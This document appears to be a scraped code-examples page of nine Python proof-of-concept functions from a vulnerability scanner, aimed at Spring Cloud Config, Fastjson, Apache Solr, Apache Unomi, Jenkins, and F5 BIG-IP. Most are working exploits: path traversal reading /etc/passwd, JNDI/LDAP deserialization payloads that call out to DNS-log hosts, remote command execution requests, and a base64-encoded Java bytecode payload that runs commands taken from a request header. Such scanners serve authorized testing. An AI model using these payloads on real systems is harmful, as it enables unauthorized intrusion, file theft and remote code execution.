Exemple #1
0
 def cve_2019_3799_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Cloud: CVE-2019-3799"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
     self.vul_info["vul_name"] = "Spring-Cloud-Config-Server Directory Traversal"
     self.vul_info["vul_numb"] = "CVE-2019-3799"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2019-04-22"
     self.vul_info["vul_vers"] = "2.1.0-2.1.1, 2.0.0-2.0.3, 1.4.0-1.4.5"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Directory Traversal"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "由于spring-cloud-config-server模块未对传入路径进行安全限制," \
                                 "攻击者可以利用多个..%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。"
     self.vul_info["cre_date"] = "2021-01-27"
     self.vul_info["cre_auth"] = "zhzyker"
     try:
         request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False)
         if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text:
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #2
0
 def fastjson_1224_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Fastjson: 1.2.24"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2017-18349"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2017-03-15"
     self.vul_info["vul_vers"] = "<= 1.2.24"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
     self.vul_info["cre_date"] = "2021-01-20"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {
         'User-Agent': self.ua,
         'Content-Type': "application/json",
         'Connection': 'close'
     }
     md = dns_request()
     dns = md
     data = {
         "b": {
             "@type": "com.sun.rowset.JdbcRowSetImpl",
             "dataSourceName": "ldap://" + dns + "//Exploit",
             "autoCommit": True
         }
     }
     data = json.dumps(data)
     try:
         try:
             request = requests.post(self.url,
                                     data=data,
                                     headers=headers,
                                     timeout=self.timeout,
                                     verify=False)
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
         except:
             pass
         if dns_result(md):
             self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #3
0
 def cve_2020_5410_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Cloud: CVE-2020-5410"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a"
     self.vul_info["vul_name"] = "Spring Cloud Config目录穿越漏洞"
     self.vul_info["vul_numb"] = "CVE-2020-5410"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2020-06-02"
     self.vul_info["vul_vers"] = "< 2.2.3, < 2.1.9"
     self.vul_info["vul_risk"] = "medium"
     self.vul_info["vul_type"] = "目录穿越漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x" \
                                 "版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。" \
                                 "恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。"
     self.vul_info["cre_date"] = "2021-01-26"
     self.vul_info["cre_auth"] = "zhzyker"
     try:
         request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False)
         if request.status_code == 200:
             if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #4
0
 def cve_2019_0193_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2019-0193"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2019-10-16"
     self.vul_info["vul_vers"] = "< 8.2.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
                                 "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
     self.vul_info["cre_auth"] = "zhzyker"
     core_name = "null"
     md = random_md5()
     cmd = "echo " + md
     payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8'))
     solrhost = self.hostname + ":" + str(self.port)
     headers = {
         'Host': "" + solrhost,
         'User-Agent': self.ua,
         'Accept': "application/json, text/plain, */*",
         'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
         'Accept-Encoding': "zip, deflate",
         'Referer': self.url + "/solr/",
         'Content-type': "application/x-www-form-urlencoded",
         'X-Requested-With': "XMLHttpRequest",
         'Connection': "close"
     }
     urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except:
             pass
         urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json"
         request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False)
         url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
         request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False)
         if request.status_code == 200 and core_name != "null":
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoC_MaYbE"
             self.vul_info["prt_info"] = "[maybe] [core name:" + url_cmd + "] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #5
0
 def cve_2020_13942_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Apache Unomi remote code execution"
     self.vul_info["vul_numb"] = "CVE-2020-13942"
     self.vul_info["vul_apps"] = "Unomi"
     self.vul_info["vul_date"] = "2020-11-23"
     self.vul_info["vul_vers"] = "< 1.5.2"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \
                                 "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \
                                 "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
     self.vul_info["cre_date"] = "2021-01-28"
     self.vul_info["cre_auth"] = "zhzyker"
     md = random_md5()
     cmd = "ping " + md
     self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
     self.headers = {
         'User-Agent': self.ua,
         'Accept': '*/*',
         'Connection': 'close',
         'Content-Type': 'application/json'
     }
     try:
         req = requests.post(self.url + "/context.json",
                             data=self.payload,
                             headers=self.headers,
                             timeout=self.timeout,
                             verify=False)
         request = requests.get(self.ceye_api + self.ceye_token)
         if md in request.text:
             self.vul_info["vul_data"] = dump.dump_all(req).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[ceye] [cmd:" + cmd + "]"
         else:
             rep = list(
                 json.loads(req.text)
                 ["trackedConditions"])[0]["parameterValues"]["pagePath"]
             if r"/tracker/" in rep:
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info["prt_info"] = "[maybe]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #6
0
 def fastjson_1247_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Fastjson: 1.2.47"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
     self.vul_info["vul_numb"] = "null"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2019-07-15"
     self.vul_info["vul_vers"] = "<= 1.2.47"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。"
     self.vul_info["cre_date"] = "2021-01-20"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
     md = random_md5()
     dns = md + "." + self.ceye_domain
     data = {
         "a": {
             "@type": "java.lang.Class",
             "val": "com.sun.rowset.JdbcRowSetImpl"
         },
         "b": {
             "@type": "com.sun.rowset.JdbcRowSetImpl",
             "dataSourceName": "ldap://" + dns + "//Exploit",
             "autoCommit": True
         }
     }
     data = json.dumps(data)
     try:
         request = requests.post(self.url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         req = requests.get(self.ceye_api + self.ceye_token)
         if md in req.text:
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[ceye] [payload: ldap://" + dns + "//Exploit] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #7
0
 def cve_2017_1000353_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Jenkins: CVE-2017-1000353"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Jenkins 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2017-1000353"
     self.vul_info["vul_apps"] = "Jenkins"
     self.vul_info["vul_date"] = "2018-01-29"
     self.vul_info["vul_vers"] = "<= 2.56, LTS <= 2.46.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Jenkins版本2.56和更早版本以及2.46.1 LTS和更早版本容易受到未经身份验证的远程代码执行的攻击。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     try:
         self.req = requests.get(self.url,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         self.jenkins_version = self.req.headers['X-Jenkins']
         self.jenkinsvuln = "2.56"
         self.jenkinsvuln_lts = "2.46.1"
         self.jver = self.jenkins_version.replace(".", "")
         self.jenkins_lts = int(self.jver)
         if self.jenkins_version.count(".", 0,
                                       len(self.jenkins_version)) == 1:
             if self.jenkins_version <= self.jenkinsvuln:
                 self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info[
                     "vul_payd"] = "[maybe] [version check] [version:" + self.jenkins_version + "]"
                 self.vul_info[
                     "prt_info"] = "[maybe] [version check] [version:" + self.jenkins_version + "]"
         elif self.jenkins_version.count(".", 0,
                                         len(self.jenkins_version)) == 2:
             if self.jenkins_lts <= 2461:
                 self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info[
                     "vul_payd"] = "[maybe] [version check] [version:" + self.jenkins_version + "]"
                 self.vul_info[
                     "prt_info"] = "[maybe] [version check] [version:" + self.jenkins_version + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #8
0
 def cve_2021_22986_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2021-22986"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
     self.vul_info["vul_numb"] = "CVE-2021-22986"
     self.vul_info["vul_apps"] = "Flink"
     self.vul_info["vul_date"] = "2021-03-11"
     self.vul_info["vul_vers"] = "< 16.0.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "BIG-IP存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过BIG-IP" \
                                 "管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令," \
                                 "创建或删除文件以及替换服务。该中断只能通过控制界面利用,而不能通过数据界面利用。"
     self.vul_info["cre_date"] = "2021-03-20"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {
         'User-Agent': self.ua,
         'Accept': '*/*',
         'Connection': 'close',
         'Authorization': 'Basic YWRtaW46',
         'X-F5-Auth-Token': '',
         'Content-Type': 'application/json'
     }
     md = random_md5()
     cmd = "echo " + md
     data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
         "RECOMMAND", cmd)
     url = urljoin(self.url, "/mgmt/tm/util/bash")
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         r = json.loads(request.text)["commandResult"]
         if request.status_code == 200:
             if md in misinformation(r, md):
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
                 self.vul_info["vul_payd"] = data
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #9
0
 def fastjson_1224_2_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Fastjson: VER-1224-2"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2017-18349"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2017-03-15"
     self.vul_info["vul_vers"] = "<= 1.2.24"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
     self.vul_info["cre_date"] = "2021-04-08"
     self.vul_info["cre_auth"] = "zhzyker"
     md = random_md5()
     cmd = "echo " + md
     headers = {
         'User-Agent': self.ua,
         'Content-Type': 'application/json',
         'Testcmd': cmd,
         'Connection': 'close'
     }
     data = {
         "@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
         "_bytecodes": [
             "yv66vgAAADMA6wEAHnlzb3NlcmlhbC9Qd25lcjk0NDQ5MTgyMDEzMzcwMAcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQAZUHduZXI5NDQ0OTE4MjAxMzM3MDAuamF2YQEACXdyaXRlQm9keQEAFyhMamF2YS9sYW5nL09iamVjdDtbQilWAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rCAAJAQAPamF2YS9sYW5nL0NsYXNzBwALAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAA0ADgoADAAPAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwAEQASCgAMABMBAAhzZXRCeXRlcwgAFQEAAltCBwAXAQARamF2YS9sYW5nL0ludGVnZXIHABkBAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsMABsAHAkAGgAdAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DAAfACAKAAwAIQEABjxpbml0PgEABChJKVYMACMAJAoAGgAlAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwAnAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAApACoKACgAKwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwALQAuCgAEAC8BAAdkb1dyaXRlCAAxAQAJZ2V0TWV0aG9kDAAzACAKAAwANAEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwA2AQATamF2YS5uaW8uQnl0ZUJ1ZmZlcggAOAEABHdyYXAIADoBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwA8AQAEQ29kZQEACkV4Y2VwdGlvbnMBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwBAAQANU3RhY2tNYXBUYWJsZQEABWdldEZWAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DABFAEYKAAwARwEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcASQEADWdldFN1cGVyY2xhc3MMAEsALgoADABMAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAjAE4KAEoATwEAImphdmEvbGFuZy9yZWZsZWN0L0FjY2Vzc2libGVPYmplY3QHAFEBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwAUwBUCgBSAFUBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcAVwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABZAFoKAFgAWwEAEGphdmEvbGFuZy9TdHJpbmcHAF0BAAMoKVYMACMAXwoABABgAQAQamF2YS9sYW5nL1RocmVhZAcAYgEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwAZABlCgBjAGYBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsMAGgAaQoAYwBqAQAHdGhyZWFkcwgAbAwAQwBECgACAG4BABNbTGphdmEvbGFuZy9UaHJlYWQ7BwBwAQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7DAByAHMKAGMAdAEABGV4ZWMIAHYBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwAeAB5CgBeAHoBAARodHRwCAB8AQAGdGFyZ2V0CAB+AQASamF2YS9sYW5nL1J1bm5hYmxlBwCAAQAGdGhpcyQwCACCAQAHaGFuZGxlcggAhAEABmdsb2JhbAgAhgEACnByb2Nlc3NvcnMIAIgBAA5qYXZhL3V0aWwvTGlzdAcAigEABHNpemUBAAMoKUkMAIwAjQsAiwCOAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABZAJALAIsAkQEAA3JlcQgAkwEAC2dldFJlc3BvbnNlCACVAQAJZ2V0SGVhZGVyCACXAQAIVGVzdGVjaG8IAJkBAAdpc0VtcHR5AQADKClaDACbAJwKAF4AnQEACXNldFN0YXR1cwgAnwEACWFkZEhlYWRlcggAoQEAB1Rlc3RjbWQIAKMBAAdvcy5uYW1lCAClAQAQamF2YS9sYW5nL1N5c3RlbQcApwEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAKkAqgoAqACrAQALdG9Mb3dlckNhc2UMAK0AcwoAXgCuAQAGd2luZG93CACwAQAHY21kLmV4ZQgAsgEAAi9jCAC0AQAHL2Jpbi9zaAgAtgEAAi1jCAC4AQARamF2YS91dGlsL1NjYW5uZXIHALoBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIHALwBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWDAAjAL4KAL0AvwEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7DADBAMIKAL0AwwEAEWphdmEvbGFuZy9Qcm9jZXNzBwDFAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwwAxwDICgDGAMkBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMACMAywoAuwDMAQACXEEIAM4BAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsMANAA0QoAuwDSAQAEbmV4dAwA1ABzCgC7ANUBAAhnZXRCeXRlcwEABCgpW0IMANcA2AoAXgDZDAAHAAgKAAIA2wEADWdldFByb3BlcnRpZXMBABgoKUxqYXZhL3V0aWwvUHJvcGVydGllczsMAN0A3goAqADfAQATamF2YS91dGlsL0hhc2h0YWJsZQcA4QEACHRvU3RyaW5nDADjAHMKAOIA5AEAE1tMamF2YS9sYW5nL1N0cmluZzsHAOYBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwDoCgDpAGAAIQACAOkAAAAAAAMACgAHAAgAAgA+AAABLwAIAAUAAAD2Egq4ABBOLbYAFE0tEhYGvQAMWQMSGFNZBLIAHlNZBbIAHlO2ACIsBr0ABFkDK1NZBLsAGlkDtwAmU1kFuwAaWSu+twAmU7YALFcqtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAI06BBI5uAAQTi0SOwS9AAxZAxIYU7YAIi0EvQAEWQMrU7YALE0qtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAEg6BBI5uAAQTi0SOwS9AAxZAxIYU7YAIi0EvQAEWQMrU7YALE0qtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAAOxAAIAAABoAGsANwAAAGgAsAA9AAEAQgAAABcAA/cAawcAN/cARAcAPf0ARAcABAcADAA/AAAABAABAEEACgBDAEQAAgA+AAAAfgADAAUAAAA/AU0qtgAwTqcAGS0rtgBITacAFqcAADoELbYATU6nAAMtEgSm/+csAaYADLsASlkrtwBQvywEtgBWLCq2AFywAAEACgATABYASgABAEIAAAAlAAb9AAoHAFgHAAwI/wACAAQHAAQHAF4HAFgHAAwAAQcASgkFDQA/AAAABAABAEEAAQAjAF8AAgA+AAADNgAIAA0AAAI/KrcA6gM2BLgAZ7YAaxJtuABvwABxOgUDNgYVBhkFvqICHxkFFQYyOgcZBwGmAAanAgkZB7YAdU4tEne2AHuaAAwtEn22AHuaAAanAe4ZBxJ/uABvTCvBAIGaAAanAdwrEoO4AG8ShbgAbxKHuABvTKcACzoIpwHDpwAAKxKJuABvwACLOgkDNgoVChkJuQCPAQCiAZ4ZCRUKuQCSAgA6CxkLEpS4AG9MK7YAMBKWA70ADLYANSsDvQAEtgAsTSu2ADASmAS9AAxZAxJeU7YANSsEvQAEWQMSmlO2ACzAAF5OLQGlAAottgCemQAGpwBYLLYAMBKgBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcstgAwEqIFvQAMWQMSXlNZBBJeU7YANSwFvQAEWQMSmlNZBC1TtgAsVwQ2BCu2ADASmAS9AAxZAxJeU7YANSsEvQAEWQMSpFO2ACzAAF5OLQGlAAottgCemQAGpwCNLLYAMBKgBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcSprgArLYArxKxtgB7mQAYBr0AXlkDErNTWQQStVNZBS1TpwAVBr0AXlkDErdTWQQSuVNZBS1TOgwsuwC7WbsAvVkZDLcAwLYAxLYAyrcAzRLPtgDTtgDWtgDauADcBDYELQGlAAottgCemQAIFQSaAAanABAsuADgtgDltgDauADcFQSZAAanAAmECgGn/lwVBJkABqcACYQGAaf937EAAQBfAHAAcwBBAAEAQgAAAN0AGf8AGgAHBwACAAAAAQcAcQEAAPwAFwcAY/8AFwAIBwACAAAHAF4BBwBxAQcAYwAAAv8AEQAIBwACBwAEAAcAXgEHAHEBBwBjAABTBwBBBP8AAgAIBwACBwAEAAcAXgEHAHEBBwBjAAD+AA0ABwCLAf8AYwAMBwACBwAEBwAEBwBeAQcAcQEHAGMABwCLAQcABAAAAvsAVC4C+wBNUQcA5ykLBAIMB/8ABQALBwACBwAEAAcAXgEHAHEBBwBjAAcAiwEAAP8ABwAIBwACAAAAAQcAcQEHAGMAAPoABQA/AAAABAABAEEAAQAFAAAAAgAG"
         ],
         "_name": "lightless",
         "_tfactory": {
         },
         "_outputProperties":{
         }
     }
     data = json.dumps(data)
     try:
         request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
         if md in misinformation(request.text, md):
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["vul_payd"] = data
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[rce] [tomcat] [cmd: " + cmd + "]"
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
